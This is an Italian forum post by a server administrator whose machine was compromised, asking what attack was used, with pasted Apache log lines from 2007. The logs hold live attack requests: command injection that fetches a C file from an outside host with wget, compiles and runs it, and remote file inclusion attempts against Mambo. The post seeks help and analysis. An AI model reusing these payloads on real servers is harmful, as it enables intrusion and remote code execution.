Ciao a tutti.
Mi sono trovato il server completamente hackerato, in data center mi hanno completamente fermato la macchina..


Nell'esame dei log di APACHE vedo questo barbut.c e http://crekom.com/barbut.c .
AVETE IDEE DI CHE TIPO DI ATTACCO E CHE FALLE HA SFRUTTATO?

################################

[21/Nov/2007:22:04:58 +0100] "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1" 200 1503 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - - [21/Nov/2007:22:05:00 +0100] "GET rm -f barbut barbut.c HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - - [21/Nov/2007:22:05:02 +0100] "GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - -

[21/Nov/2007:22:05:02 +0100] "GET /mambo//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/ HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.-.178 - -

[21/Nov/2007:22:05:03 +0100] "GET arbut ;rm -f barbut barbut.c HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - - [21/Nov/2007:22:05:07 +0100] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/cmd.gi HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.-.- - -

[21/Nov/2007:22:05:09 +0100] "GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.-.- - -